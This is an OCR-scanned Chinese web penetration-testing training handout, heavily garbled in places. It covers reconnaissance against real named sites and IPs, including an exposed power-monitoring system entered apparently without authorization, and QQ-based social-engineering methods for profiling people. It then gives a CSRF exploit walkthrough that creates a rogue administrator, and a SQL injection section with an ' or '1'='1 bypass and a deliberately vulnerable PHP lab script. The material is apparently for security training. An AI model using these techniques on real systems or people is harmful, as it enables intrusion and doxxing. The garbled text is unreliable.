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收集 什么 ? 


E Whois 信 息 A 

o 注册 人 名 字 、 邮 箱 等 
e IP 信息 (服务 器 的 IP ) 

o HLS 为 CDN 节 点， 得 询 同 IP 网 站 ， 端 口 扫描 
e H Ke 8 A 

o T NEBE 用 ， 获 取 网 站 后 台 目 录 ， 获 取 其 他 
e 服务 信息 

o 判断 服务 ， 例 如 : IIS `> Apache 
e 脚本 信息 

o ASP^ PHP^ aspx (asp.net) 
e 框架 信息 

o 加 ` Struts = 
@ 应 用 信息 WS 

o ELE] * dedecms ` phpems # 
© 子 域 名 信 息 


O XXX.XX.Ccom XXX . XXX . XX. COM 


WHOIS 


查询 工具 : http://whois.chinaz.com ° 


ina hi-ourlife.com 的 信息 立即 更 新 


hi-ourlife.com [whois R=] 


IP 信息 


域名 
其 他 常用 域名 后 级 查 询 : cn com net org 

XA HICHINA ZHICHENG TECHNOLOGY LTD 

BE x A modify modify [whois €] 
BEX 6274376869 qq.com [whoisk €] 
Sms 2016 年 05 月 07 日 
IERE 2015098038 
斗 期 时 间 ] 2017 年 09 月 03 日 

= ma yun | 


grs-whois.hichina.com 


DNS f1ginsl.dnspod.net 
flgins2.dnspod.net 
状态 域名 普通 状态 (ok) 


a 


我 们 可 以 ping X^ URL: 


C:\Users\asus> ping www.hi-ourlife.com 


正在 Ping www.hi-ourlife.com.cname.yunjiasu-cdn.net [162.159.209. 
78] 具有 32 字 节 的 数据 ， 

来 自 162.159.209.78 的 回复 : 字 节 =32 时 间 =215ms TTL-52 

KH 162.159.209.78 的 回复 : 字 节 =32 时 间 =217ms TTL-52 

来 自 162.159.209.78 的 回复 : 字 节 =32 时 间 =218ms TTL-52 

KH 162.159.209.78 的 回复 : 字 节 =32 时 间 =222ms TTL=52 

162.159.209 


数据 包 : 


已 发 送 


.78 的 Ping 统计 信息 ; 
4， 已 接收 = 


往返 行程 的 估计 时 间 ( 以 毫秒 为 单位 ) : 


最 短 


但 显然 ， 这 里 的 IP 是 CDN $ IP o 
我 们 可 以 使 用 多 地 ping 工具 来 判断 : 


215ms°> mK = 222ms° #3 


218ms 


4* £X = 0 (0% £X)» 


湖南 长 阔 [电信 ] 162.159.209.78 美国 百度 云 加 速 节点 


湖北 孝感 [电信 ] 162.159.209.78 美国 百度 云 加 速 节 点 
贵州 兴 尺 [电信 ] HJ (Ei) 

T2885 [ABE] 162.159.208.78 美国 百度 云 加 速 节点 
江西 新 余 [ 电 信 ] 162.129.208.78 美国 百度 云 加 速 节 点 
广西 南宁 [电信 ] 162.159.209.78 美国 百度 云 加 速 节点 
江苏 泰州 [电信 ] 162.159.209.78 美国 百度 云 加 速 节 点 
浙江 绍兴 [电信 |] 162.159.208.78 美国 百度 云 加 速 广 点 
福建 福州 [电信 ] 162.159.208.78 美国 百度 云 加 速 节 点 


一 般 来 说 ， 使 用 了 CDN 的 网 站 在 不 同 地 点 的 ping 结果 是 不 一 样 的 。 不 过 这 里 它 
直接 写 出 了 百度 云 加 速 节点 。 


那么 如 何 找 出 源 站 IP % °? 


1. 查询 子 域 : 许多 情况 下 只 有 主 站 使 用 了 CDN， 二 级 站 点 并 没有 ， 所 以 我 们 就 
可 以 直接 查询 分 站 的 |P。 分 站 的 搜索 方法 见 下 文 。 


2. 国内 部 分 CDN 服务 只 针对 国内 ， 对 国外 的 访问 几乎 不 使 用 CDN。 所 以 我 们 可 
以 通过 国外 冷门 DNS 查询 域名 。 比 
如 ， nslookup xxx.com 199.89.126.10 ° 


C:NUsersNasusNDesktop» nslookup hi-ourlife.com 199.89.126.10 
服务 器 : UnKnown 
Address:  199.89.126.10 


FEAL RL : 
PL hi-ourlife.com 
Address: 45.64.65.85 
3. 历史 解析 记录 : CDN 49 IP HA 3j Pp 78 83 IP 35x IP © 


http://toolbar.netcraft.com/site report?url- 


查询 邮件 : KR 2 RR AES E up AiÉXIe €T YE ERRA X IP o tks A 
主动 发 送 邮 件 ， 然 后 右键 查询 源 代 码 ， 就 能 获得 真实 IP。 


Last reminder about Strata Business Summit 

At. A : O'Reilly Media <oreilly@post.oreilly.com> 

Hj 间 :2017 年 2 月 28 日 (星期 二 ) 74:16 (UTC-08:00 温哥华 、 洛 杉 丽 、 西 雅 图 时 间 ) 

t+ MEN 

X 小 x 23K 

打印 | | 显示 邮件 原文 | 导出 为 eml 文 件 | 邮件 有 乱码 ? | 转发 到 群 邮件 | 保存 到 记事 本 | 添加 到 日 历 | 作为 附件 转发 





Received: from pip84. smf. ipost. com (unknown |[204. 94. 81. 84]| 
by newmxl4. qq. com (NewMx) with SMTP id 
for Guim. Tue, 25 Feb 2017 20:26:51 +0800 

X-QQ-FEAT: 6dXuswn9ilVHst+TPyWYf/2arzkME1Dj1X226lipumwdUxktxWJmGRgsoAg/vp 
Lz2AyvfwFEQrzl/]9cOXvRz4QagPxDnaO0sGwZ/*9Sh12k0N jCZok]WpGTTkOv /hNr20ywaM 
8C jdJrGahobZnvPY5vxmpÜAzZh3typ-^4LvmnkDd6/ tNG8 /CTtRtkEgt5QnBOz Y JmFm 30710 
6KQS1CnTqkUOK £Z/ ZRoWUE3i sWAKV JxqkWR9C jWqe82UcMa/D30 jbPYQLC+UVAKLRhre9Ly 
litTfadGstfPrRL5sDYDj60bCM/TwZoWRe5bqZl5TiilylOhOIALHvrfHw- 

X-QQ-MAILINFO: NL3WKUOjleeI96t95/bCES/QXMAsPN4gzZrxMhh32rXoTFfuKM4oeWe JP 
MoV tnCgk3VZQ1VAXMz2LDbdoGqg98M= 

X-QQ-mid: usamxproxyl3t1488284815tpaljk4 

X-QQ-CSender: errors*9zlzahmlcn9851i98r123e46 ja4kc3u6j/v9dpm9irludÜUpost. oreilly. com 

X-QQ-ORGSender: errors-49zlzahmlcn95i9rl23e46 ja4kc3u6j7v9dpm9irludÜUpost. oreilly. com 


Bog ARA G3&:http://tool.chinaz.com/same/ ° 


端口 扫描 可 以 使 用 Nmap 进行 ， 请 见 “ 工 具 篇 Nmap"— Y ° 


E] k1 8 NY 


主动 式 扫 描 : NR. XGA 


o AVWS : 根据 站 点 的 链接 〈 见 “工具 篇 AVWS’— 7 ) 
o PA] : 根据 固定 的 字典 


7 sie 


¿$g [on e| (条 [EU 核心 * SHE) DIR: 1153 ASPX: 822 M200 
um | ASP: 1854 PHP: 1066 O Mao 
超时 : 15 v | Ob BPM mE ES ) HOB: 4198 JSP: 631 O 探测 |3XX 
扫描 信息 : ERMA... 扫描 线程 : 0 THEE: oA 
ID 地 址 HTTPS 





2. 被 动 式 扫描 : Burp Spider 
3. Google Hack 


intitle : 搜索 网 页 标题 中 包含 有 特定 字符 的 网 页 
inurl :搜索 包含 有 特定 字符 的 URL 
intext :搜索 网 页 正文 内 容 中 的 指定 字符 
filetype : 搜索 指定 类 型 的 文件 

o site :搜索 与 指定 网 站 有 联系 的 URL 
4. robots.txt (补充 ) 


O O O O 


重点 看 Disallow 的 部 分 。 








Wizard 


[Æ] https//www.baidu.cor x W 7 


€ > C |a Z2 |https//www.baidu.com/robots.txt 六 Ga 


User-agent: Baiduspider 
Disallow: /baidu 
Disallow: /s? 

Disallow: /ulink? 
Disallow: /link? 


User-agent: Googlebot 
Disallow: /baidu 
Disallow: /s? 
Disallow: /shifen, 
Disallow: /homepage 
Disallow: /cpro 
Disallow: /ulink? 
Disallow: /link? 


User-agent: MSNBot 
Disallow: /baidu 
Disallow: /s? 
Disallow: /shifen 
Disallow: /homepage 
Disallow: /cpro 
Disallow: /ulink? 
Disallow: /link? 


User-agent: Baiduspider-image 

Disallow: /baidu 

Disallow: /s? 

Disallow: /shifen 

Disallow: /homepage v 





5. 联网 设备 搜索 


o 钟 代 之 上 服 www.zoomeye.com ° 


o Æ www.oshadan.com 。 


联网 设备 搜索 引擎 可 以 检索 到 许多 搜索 引擎 不 收录 的 页 面 ， 通常 是 后 人 台 和 车 页 
面 。 


构造 检索 关键 词 时 : 


o 系统 /后 人 台 类 ， 可 以 搜索 “XXX 系统 /平台 /管理 ”。 
o nerd q XL Eo a 业 / 公 司 /平台 ”。 
比如 我 们 要 挖 电信 的 系统 ， 可 以 搜索 “电信 系统 /平台 /管理 ”。 


这 里 使 用 傻 蛋 这 个 平台 演示 一 下 ， 它 不 仅仅 能 监控 系统 ， 还 外 搜索 到 一 些 内 网 
的 系统 。 比 如 我 们 要 挖 一 些 电信 系统 ， 这 里 点 击 全 网 搜索 ， 可 以 看 到 很 多 外 网 
A KEAN AS AF 





监测 名 称 监测 站 点 安全 等 级 操作 

谷歌 GlassFish 应 用 服务 器 wdcp 主 机 管理 系统 
默认 http://220.250.64.122/sky gc o 查看 
vigors Hag 深信 服 上 网 行为 管理 RRL ESS 
电 商 系统 中 兴 设 备 大 华 设 备 openssl 
沃 世 达 网 络 摄像 头 d-link Tomcat 腿 务 器 WebLogic 服 务 器 
Cisco 路 由 器 Joomla 
热门 搜索 安全 动态 
dvrdvs cisco metageneratorWebLodgic python wordpress appservice:rsync 北京 "Hisl iail 
a Zr I Sit A ee 
title :在 线 教育 hikvision ZTE F460 thinkphp 国家 :中 国 port161 D-Linki 议 备 文 件 上传 及 注入 漏洞 


n BIND DoS#ara 
httponly. gitlab session 国家 :中 国 地 区 .北京 httpserver.GlassFish 


c WE S i nene dM 





port :6000 R HTTP/1.1 200 Ok 
p:202 104 .13.169 ee pe 
http:/202.104.13.169:6000 

2016-06-28 00:55:58 httpser 

‘eR: 113.12, 23.02 content 


国 中 国 广东 省 佛山 市 ia 





收藏 ” nene M 


port :81 HTTP/1.1 400 Bad Request 
p 183.60.202.207 

http: /Awww.514pk.com:81 

2016-05-23 15:27:57 ttpserve 


ABER: 113.12, 23.02 ntent t 


a MÀ à 





我 们 点 击 其 中 一 个 “汕尾 用 电 监控 系统 ” 
于 一 种 越权 或 者 绕 过 。 


谷歌 


wdcp 主 机 管理 系统 


深信 服 上 网 行为 管理 


电 商 系统 


可 以 看 到 人 详细 的 用 电 情况 ， 





经 济 管理 系统 


GlassFish 应 用 服务 器 


vigorke Hae 


海 康 威 视 摄像 头 


中 兴 设 备 
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^ min 
XD 
v 大 多 
+| S242 
=j 
上 英 镇 
赤石 镇 
赤 坑 镇 
p 
大 湖 镇 
S241 


服务 信息 


查看 返回 的 数据 包 的 Server 头 ， 获 取 Server 信息 。 
如 Server:Microsoft-IIS/6.0 。 


陆丰 市 


X Bet 


$338 


常用 地 区 
日 汕尾 市 
汕尾 市 ( 默认 地 址 ) 








GET / HTTP/1.1 

Host: www.hi-ourlife.com 

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:49.0) Gecko/2 
0100101 Firefox/49.0 

Accept: text/html, application/xhtml+xml, application/xm1;q=0.9, */ 
*;q=0.8 

Accept-Language: zh-CN, zh; q=0.8, en-US; q=0.5,en;q=0.3 
Accept-Encoding: gzip, deflate 

Cookie: | cfduid=d85643dc0/7ab45d17ec48c37dde/7145d11480308480; PH 
PSESSID=qfg2unrqvciadhvcpn8ejhguqulakcd2; CNZZDATA1258769653=151 
4150716 -1480308628 -%7C1480308628; timezone=8 

X-Forwarded-For: 127.0.0.1 

Connection: keep-alive 

Upgrade-Insecure-Requests: 1 


HTTP/1.1 200 OK 

Date: Mon, 28 Nov 2016 05:43:11 GMT 
Content-Type: text/html; charset=utf-8 
Transfer-Encoding: chunked 

Connection: keep-alive 

Product: Z-BlogPHP 1.5 Zero 

Expires: Thu, 19 Nov 1981 08:52:00 GMT 
Cache-Control: no-store, no-cache, must-revalidate, post-check=0 
, pre-check=0 

Pragma: no-cache 

Vary: Accept-Encoding 

Server: yunjiasu-nginx 

CF-RAY: 308b8035114c226a-LAX 
Content-Encoding: gzip 


ix ASF LE VRNTIRS Z 


hs 
之 
ce 
5 
x< 


脚本 信息 


1. 查看 返回 的 数据 包 中 的 X-Powered-By 的 值 
2. 查看 cookie 中 的 信息 


PHPSESSID 
ASPSESSID 


比如 上 面 的 封包 中 出 现 了 PHPSESSID ， 说 明 站 点 很 可 能 使 用 PHP 编写 。 


通过 报错 信息 或 是 URL 结 构 获 取 网 站 使 用 的 框架 信息 。 如 ThinkPHP，Struts 等 。 


e & BS 息 收 集 集 


应 用 信息 


目录 特征 、 文 件 特征 、 指 纹 打 描 工 具 、 网 站 特征 等 


比如 存在 wp-login.php 就 可 能 是 WordPress。 


子 域名 信息 


e 子 域名 挖掘 机 





域名 : baidu. com li (|| A5 | 回 有 最 务 接口 [viste CARH 








ID 域名 解析 IF CH 去 

www. bbsems. net. yizhan. bai du. com 123. 125. 115. BAS E EBFICDN 

882 www. dzgbw. com. yizhan. baidu. com 123. 125. 115. BIB ES EBFCDN 

883 www. zk££s. com. yizhan. baidu. com 123. 125. 115. 可 能 没有 使 用 CIN 

884 www. hiphotos. bai du. com 124. 238. 238. a 238. 238. 119, 124. 238. 238. 118 

885 www. my. bai du. com 180. 149. 131. EE ERICUE 

886 www. post. baidu. com 180. 149. 131. 可 能 没有 使 用 CN 
www. sddzxc. gov. cn. yi zhan. bai du. com 123. 125. 115. 人 

888 www. smdphoto. com. yizhan. baidu. com 123. 125. 115. 可 能 没有 使 用 CIN 

889 wwwl0. baidu. com 220. 181.111. E 181. 111. 148, 220. 181. 112. 143 

590 set. baidu. com 10. 32. 36. 145 10. 32. 36. 145, 10. 81. 12. 102 
x dc b ai du con 打开 网 站 180. 149. 131. 33 可 能 > #1 FACDN 服务 接口 
xingzhi.baidu. com 180. 149. 131. 33 Bae: git HACIN 
PEPE vane ORE SE 复制 域名 220. 181. 111.85 220. 181. 111. 85, 220. 181. 111. 86 
eye. bai du. com 复制 IP 10. 46. 104. 43 可 能 没有 使 用 CI 
xizang. baidu. com 220. 181. 111. 86 220. 181. 111. 86, 220. 181. 111. 85 
plan. baidu. com 复制 CDN 10. 36. 155. 43 可 能 没有 使 用 CI 
yuanmingyuan. bai du. 导出 域名 180. 149. 131. 33 可 能 没有 使 用 CH 
yunnan. bai du. com 导出 域名 和 IP 220. 181. 111. 86 zs 181. 111. 86, 220. 181. 111. 85 
live. baidu. com 10. 36. 23. 62 10. 36. 23. 62, 10. 26. 40. 19 
zhangmenshiting1. baidu. com 222.186. 128. 157 222.186. 128. 157, 218. 92. 221. 71 
zhangmenshi ting. bai du. com 125. 76.251. 40 125. 76. 251. 40, 125. 76. 251. 41 
zhejiang. baidu. com 220. .111. 86 220. 181. 111. 86, 220. 181. 111. 85 
zhidaocommit. baidu. com 180. . 131. 104 180. 149. 131. 104, 220. 181. 111. 127? 
zidao. baidu. com 220. .111.12f 220. 181. 111. 127, 180. 149. 131. 104 
a. hiphotos. baidu. com .238. 238. 118 124. 238. 238. 118, 124. 238. 238. 119 
b. hiphotos. baidu. com : .238. 118 124. 238. 238. 118, 124. 238. 238. 119 
cdn. client. baidu. com .238. 238. 117 BIB E EFICDN 
counter. baidu. com : . 112. 143 220. 181. 112. 145, 220. 181. 111. 148 
ct—rpn. bai du. com . 181. 50. 247 BA: E EFICDN 


域名 总 数 : 1459 HE: 暴力 校 举 模式 运行 中 校 举 状态 : (16884/20949) tyu. baidu. com 作者 : Seay 访问 博客 








e 搜索 引擎 : site:*.xxx.com 


个 人 信息 AMEN 


社会 工程 学 : 使 人 们 顺从 你 的 意愿 、 满 足 你 的 欲望 的 一 门 艺术 与 学 问 。 
QQ 空间 人 肉 方法 的 思维 导 图 
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留言 内 容 泄露 了 你 的 信息 


例子 : 李 四 今 天 上 课 看 米 斯 特 教程 被 老师 逮 到 了 ， 哈 哈哈 


内 容 泄露 个 人 铭 感 信息 


QQ 空间 空间 说 说 
A, TC 
空间 相册 泄露 了 你 


空间 相册 有 你 的 生活 记录 、 你 的 个 人 自拍 


你 朋友 点 赞 了 





你 朋友 评论 了 


[| 
MY K 


` 


e 信息 安全 汇 露 只 在 一 念 之 问 ( 一 ) 企 鹅 扣 扣 
e 社工 研究 组 文集 
e Kali Linux 秘籍 第 四 章 信息 收集 


e Kali Linux Web 渗透 测试 秘籍 第 二 章 侦查 


aif : 同学 名 字 李 四 


通过 访问 你 朋友 空间 获取 关于 你 的 信息 


通过 社工 你 朋友 来 获取 关于 你 的 信息 


你 朋友 的 信息 也 会 被 拿 到 


评论 内 容 泄露 了 关于 你 的 信息 
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米 斯 特 白 由 培训 讲义 漏洞 篇 CSRF 


讲师 : ghOstkey 
整理 : 飞龙 
协议 : CC BY-NC-SA 4.0 


CSRF (Cross-site request forgery 跨 站 请 求 伪 造 ， 也 被 称 为 “One Click Attack" S 
Session Riding， 通 第 缩写 为 CSRF 或 者 XSRF， 有 是 一 种 对 网 站 的 恶意 利用 。 尽 管 听 
起 来 像 跨 站 脚本 (XSS) ， J£." 5 XXSS3E RAR > 并 且 攻 击 方式 几乎 相左 。XSS 利 
用 站 点 内 的 信任 用 户 ， 而 CSRF 则 通过 伪装 来 自 受 信任 用 户 的 请 求 来 利用 受信 任 的 

网 站 。 与 XSS 攻 击 相 比 ，CSRF 攻 击 往往 不 大 流行 《因此 对 其 进行 防范 的 资源 也 相 

当 稀少 ) 和 难以 防范 ， 所 以 被 认为 比 XSS 更 具 危 险 性 。 


CSRF 攻击 的 原 | 建 一 个 链接 ， 受 害 者 点 击 它 之 后 就 可 以 完成 攻击 者 
想 要 的 操作 ， 这 些 操作 一 般 是 删除 文章 ， 创 建 用 户 之 类 。 上 比如 某 网 站 的 删除 文章 链 
接 是 VERENA DEREN MEDIUM ETE ' 那么 攻击 者 可 以 直接 构造 出 来 
发 给 有 权限 的 人 ， 它 点 击 之 后 就 可 以 将 文章 删除 。 当 然 ， 攻 击 者 也 可 以 使 用 当下 流 
行 的 短 网 址 服务 来 伪造 URL， 避 更 受到 怀疑 。 


与 传统 的 认 知 相反 ， POST 方式 并 不 人 oe See ee) ee 
发 送 POST 请 求 的 能 力 。 比 如 攻击 者 可 以 编写 一 个 带 表 单 的 页 面 ， 包 含 目 标 URL 
和 所 有 所 需 字段 ， 然 后 再 用 JS 代码 提交 表单 。 之 后 把 这 个 表单 放 到 网 络 上 可 以 读 
问 的 地 方 ， 再 把 这 个 链接 发 给 受害 者 ， 诱 导 他 点 击 。 


Wo S 3L UG $ a. EARNE: 
d SR o NA RBRY FH 来 完成 的 操作 就 不 会 有 这 个 问题 。 


利用 


我 们 可 以 使 用 OWASP 的 CSRF-Tester 来 半自动 利用 CSRF 漏洞 ， 还 可 以 生成 用 
于 利用 的 exp 页 面 。 


要 注意 的 是 ， 它 不 会 为 你 判断 是 否 存 在 CSRF 漏洞 ， 想 想 也 知道 ， 一 个 网 站 上 的 一 
次 完成 的 操作 简直 大 多 了 ， 那 所 有 这 些 操作 都 存在 CSRF RAG? 并 不 是 ， 只 有 重 
要 的 ， 不 可 挽回 的 操作 才能 算 CSRF 操作 ， 而 这 个 是 机 器 判断 不 了 的 。 所 以 你 首先 
要 知道 哪里 有 CSRF 漏洞 ， 才 能 使 用 工具 。 


我 们 用 它 来 利用 yzcms， 这 是 一 款 开 源 的 CMS。 我 们 首先 访问 后 台 : 


漏洞 简 CSRF 


4 (9: 58/ 153 18x 





| < C o | 域名 重 定向 htt /Aocalhost/yzcms/adm php ee 图 .点 此 搜索 Q.*5-.6n0z 
|> Ta - DFi N 谷歌 ais Osco FRR ORE 级 2345 网 址 Nübneosu : Bes e @PR ~ mmz ~ Beh o 四 游戏 、 辕 登 录 管家 
6 COLETTI MS. PACES, RAAT BARUMEE o 关闭 @ x 


^ 信息 管理 系统 界面 L Ane No @ SL STR 

















图 文 资讯 ”常用 工具 文件 管理 系统 设置 bi | Een RAWS 


[添加 管理 员 ] 





序号 用 户 名 MEAE 最 后 登录 IP 最 后 登录 时 间 电子 邮箱 添加 日 期 添加 人 操作 


RES 
1 admin 超级 管理 员 127.0.0.1 2016-07-05 19:52:53 214243830@qq.com 2016-07-05 14:37:26 系统 修改 | 删除 





» 修改 个 人 信息 
|} 网 站 基本 设置 
> 网 站 附加 设置 
，SMTP 邮 箱 配置 
> 404 页 面 设置 
Cg 常用 工具 
Lg 数据 备份 与 恢复 


(Dg 关 于 我 们 

















站 今日 特卖 C5) 今日 直播 ema © wise VTR P Æ O dq)  Q 05 


我 们 点 击 右上 方 的 添加 管理 员 


位 置 : EN RMSE > 


FAAP os: 
uo mM 
ALARA : 
电子 邮箱 : 


FERAE: Sm T 


Te 


当 我 们 创建 的 时 候 ， 浏 览 器 会 向 服务 器 发 请 求 。 我 们 就 可 以 伪造 这 个 请 求 ， 构 造 出 
exp 页 面 ， 然 后 让 已 经 登录 的 管理 员 去 访问 这 个 页 面 ， 就 能 成 功 创建 管理 员 。 


我 们 打开 工具 ， 我 们 看 到 工具 一 打开 ， 就 监听 了 本 机 的 8008 端口 : 


14 


cx MESE 1 exe 






七 月 e5. 
I8 — 


信息 ,: Proxy listening on i127.0.0.1:8008N 





[3 £3 






| admir 
-Jof xj 









Clear All 

















| | Start Recording 
| B xm ii ORNATA 
Method | URL Parameters | Pause 
] 站 基本 设置 ES 
* : RHEA 从 (GET e 
] 站 附加 设置 =. Te : a 
J CSRFTester-1.0 Query Parameters | Form Parameters 
vTP 邮 箱 配 a inn y |. 
]4 页 面 设 置 D 共享 文档 
X 我 的 电脑 - 
用 工具 «9 网 上 邻居 = | | 
uRan5t Include Regex: | | Reset | 
rtis B Y Exclude Regex: |.^.(gifljpg|png|csslico|js|axdV? *ico)$ | Reset 
EFEM > 
Report Type: (€ Forms ©) iFrame ©) IMG <> XHR © Link “| Display in Browser | Generate HTML 





| 类 型 : ws-pos HAMETE 修改 日 期 : 2007-11-5 12:46 大 小 : 187 FB 


我 们 需要 将 浏览 器 的 代理 配置 为 127.0.0.1:8008 。 然 后 点 
a Start Recording ， 它 会 开始 抓 取 请 求 。 





File Options 








OWASP CSRFTester | Clear All || 








Step | Method URL | Parameters 














| | _ u || | 

[ ET 
|GET | ~| | | 
Form Parameters | 














Wer Parameters | 


Include Regex: |+ || Heset | 
Exclude Regex: oipalpnolesslicolsla eS | Reset | 


























] 
Report Type: @ Forms (Ò iFrame (O IMG «> XHR ©: Link «| Display in Browser | Generate HTML | 











这 时 我 们 返回 CMS 页 面 ， 模 拟 创建 一 个 管理 员 : 


WH: 首页 SER 


APA: msttest001 
NE 12: TT 
UmLASERD  aaaesesece 


电子 邮箱 :  mesttestütgnqaq.com 


ll 


| pppn: [超级 管理 
; 


E 


我 们 可 以 看 到 Melee 了 若干 请 求 ，POST 的 那个 就 是 创建 管理 员 的 请 求 。 我 们 点 
击 这 个 请 求 那 一 行 ， 观 罕 下 方 的 Form Parameters ， 没 有 任何 的 Token 验证 。 


OTASE CSEFTester EM XJ 
: File Options 


i Step | | Method | URL | Farameters | Pause | 








Request I) POSE httparacalhastsüyzem... Uname=msttestl01&p... 46 
Request 1 GET http localhostedsecm... jr 
|: Request 5 GET httpse.350.cn:Sü/ssrc... T5 








Request t 4b | 


POST - http:ilocalhost8ülyzems/adminiadd. admin php 


auer Parameters Form Parameters 
Uname=mstesti0 














pwd=mstte st001 
repwd=msttestlo1 











Exclude Regex: |." (giflipalpna|lcss[ica|js|axd V? ticot 








Include Regex: |.* | Reset | 


Report Type: & Forms (O iFrame ©) IMG ©) XHR (> Link Display in Browser Generate HTML 


Moving to row 0 





参数 的 值 可 以 任意 修改 。 我 们 看 一 看 底下 的 Report Type ， 这 个 就 是 构造 方式 ， 
可 以 选择 使 用 «form» ^ «iframe» ^ <img> 、AJAX、 或 者 <a> 来 构造 。 这 
里 我 们 选择 Forms。 之 后 我 们 点 击 右 边 的 Generate HTML ， 选 择 一 个 地 方 来 保 


Bo 


我 们 可 以 把 这 个 文件 发 给 受害 者 ， 让 他 打开 。 也 可 以 放 到 网 上 把 链接 发 给 受害 者 。 
我 们 试 着 打开 它 ， 当 我 们 打开 之 后 ， 我 们 可 以 看 到 ， 成 功 添加 了 我 们 所 需 的 管理 









ne 
、 
我 的 阿 站 -YzmCWNS 信 息 管 理 系 统 冯 > | ERASE 十 I4: 44/ F5: 18 
《 C Q | 域名 和 定向 localhost e 图 pe v iz 
auum - O St 谷歌 SMLAS CO ssomuR RMP Mek FeosskHb W recs A "PES! D FH gni 总 截图 "me ERE 
位 置 : 首页 Seas [添加 管理 员 ] 
序号 用 户 名 MEAE 最 后 登录 IP 最 后 登录 时 间 电子 邮箱 添加 日 期 添加 人 HE 
1 admin 超级 管理 员 27.0.0.1 2016-07-05 19:52:53 214243830@qqa.com 2016-07-05 14:37:26 系统 修改 | MER 
6 msttest001 gg em 1970-01-01 08:00:00 msttest001@qq.com 2016-07-05 19:54:35 admin 修改 | MER 
7 修改 | BER 
"2 加 速 器 LT I 100% 





MY 3K 


e 新 于 指南 : DVWA-1.9 全 级 别 教程 之 CSRF 


米 斯 特 白 帆 培 训 讲 义 漏洞 篇 SQL 注入 


讲师 : ghOstkey 


ik : CC BY-NC-SA 4.0 


原理 与 危害 


SQL 注入 就 是 指 ， 在 输入 的 字符 串 中 注入 SQL 1% 6] * 如 果 应 用 相信 用 户 的 输入 而 
对 输入 的 字符 囊 没 进行 任何 的 过 滤 处 理 ， 那 么 这 些 注 入 进去 的 SQL 语句 就 会 被 数 
据 库 误 认为 是 正常 的 SQL 语 名 而 被 执行 。 


恶意 使 用 SQL 注入 攻击 的 人 可 以 通过 构建 不 同 的 SQL 语句 进行 脱 实 、 命 令 执 4 
E Webshell、 读 取 度 武器 敏感 系统 文件 等 亚 意 行为 。 


tS: WooYun-2013-38318 
mig. SED ESEsqIPEAEeERPÉTERPMERIESE 


WooYun-2015-123175 
FAITS RAER R PR Z2 RIEGO FW (OS Li Sd) 之 二 


WooYun-2015-115378 
SIRE uh Ts CETB FH S QLIGE A (PRA NOES RSE P ORE ) 





以 上 来 自 乌云 的 案例 ， 都 是 利用 SQL 注入 所 造成 的 一 系列 危害 。 


成 因 


首先 来 看 这 一 段 代 码 (视频 中 不 是 这 段 代码 ， 因 为 其 更 适合 讲解 ， 所 以 用 这 上段 代 
A): 


$un = Q$ POST['un']; 
$pw = @$_POST['pw']; 
$sql = "select * from user where un-'$un' and pw-'$pw'"; 


可 以 看 到 代码 首先 从 HTTP 主体 取得 un 和 pw 两 个 参数 ， 这 两 个 参数 显然 未 加 
过 滤 。 之 后 代码 将 其 拼接 到 SQL 语句 中 。 


如 果 恶 意 用 户 将 un 指定 为 任意 正常 内 容 ， bw 为 非 正常 内 容 ， 那 么 就 有 被 攻击 的 
风险 。 比 如 我 们 将 un WA admin * pw WA ' or '1'='1 。 则 整个 SQL 语 
外 会 变 为 : 


select * from user where un='admin' and pw='' or '1'z'1' 


可 以 看 到 where 子 句 对 于 任何 用 户 都 是 恒 成 立 的 。 那 么 我 们 就 成 功 绕 过 了 它 的 身 


份 验证 。 


环境 拾 建 〈 和 补充 ) 


视频 中 的 程序 我 找 不 到 ， 所 以 还 是 自己 搭 个 靶场 演示 吧 ， 但 是 步骤 是 一 样 的 。 关 于 
数据 库 环 境 我 想 说 一 下 ， 不 同 数 据 库 使 用 不 同 的 配置 和 SQL 方言 ， 一 个 数据 库 上 
有 用 的 方法 不 一 定 能 用 在 另 一 个 数据 库 上 。 但 是 ， 目 前 70% 的 网 站 都 使 用 
MySQL， 所 以 这 篇 讲义 只 会 涉及 MySQL ° 


大 家 可 以 下 载 DVWA 在 本 地 建立 实验 环境 ， 如 果 觉 得 麻烦 ， 可 以 自己 写 个 脚本 来 
建立 。 这 里 教 给 大 家 如 何在 本 地 建立 实验 环境 。 


首先 要 在 任意 数据 库 创 建 一 张 表 ， 插 入 一 些 数据 : 


drop table if exists sqlinj; 

create table if not exists sqlinj ( 
id int primary key auto increment, 
info varchar(32) 

); 


insert into sqlinj values (1, "item #1"); 


这 里 我 们 创建 了 sqlinj 表 ， 并 插入 了 一 条 数据 。 其 实 插 入 一 条 数据 就 够 了 ， 足 以 
查看 显示 效果 。 


之 后 我 们 将 以 下 内 容 保 存 为 sql.php 


在 文件 目录 下 执行 php -S 0.0.0.0:80 ， 然 后 访 
http://localhost/sql.php ， 然 后 就 可 以 进行 各 


je] 


<form method="GET" action=""> 
ID: 
<input type="text" name="id" /» 
«input type="submit" value="#@iq" /> 
</form> 


<?php 
// KRE EE 的 配置 : 
$host = 
$port = 3306; 
$un = ''; 
$pw = 7; 
$db = ''; 
$id = @$_GET['id']; 
if($id == '') 
return; 
$conn = Qmysql connect($host . ':' . $port, $un, 
if(!$conn) 
die(' 数 据 库 连接 错误 : ! . mysgl error()); 
mysql select db($db, $conn); 
$sql = "select id, info from sqlinj where id-$id"; 


$res = mysql query($sql, $conn); 
if(!$res) 

die(' 24/472: '. mysgl_error()); 
$num = mysql num rows($res); 
if($num == 0) 


: echo "<p>ID : $id</p>"; 
echo "<p> 无 此 记录 </p>"; 

} 

else 

{ 


$row = mysql fetch row(S$res); 
echo "<p>ID : $id</p>"; 
echo "«p»Info: ${row[1]}</p>"; 


mysql close($conn); 


手工 注入 : 基于 回 显 


基于 回 显 的 意思 就 是 页 面 中 存在 显示 数据 库 中 信息 的 地 方 ， 通 过 注入 我 们 就 和 


们 
XL f 


PRIFT ° 


$pw); 


Ede dX, 


要 查询 的 东西 显示 在 页 面 上 。 一 般 页 面 中 显示 相关 信息 (比如 帖子 标题 、 内 容 ) 


ILA zc RFE EBAY © 


Fl] BT VEAL 


我 们 将 id HA 1 and 1-21 ， 发 现 正常 显示 。 


e C localhost/sql.php?id=1%20and%201=1 


xs 查询 | 











ID: Tand 1-1 
Info : item #1 
将 id TEA leaned ， 显示 “无 此 记录 ” 


e C | © localhost/sal.php?id- 19620and96201 -2 


iD: Eng 

















[D : Land 1-27 
无 此 记录 
那么 这 里 就 很 可 能 出 现 注 入 点 。 


判断 列 数量 
我 们 下 一 步 需要 判断 查询 结果 的 列 数量 ， 以 便 之 后 使 用 union 4 ° 4144938 : 


id=1 order by ? 


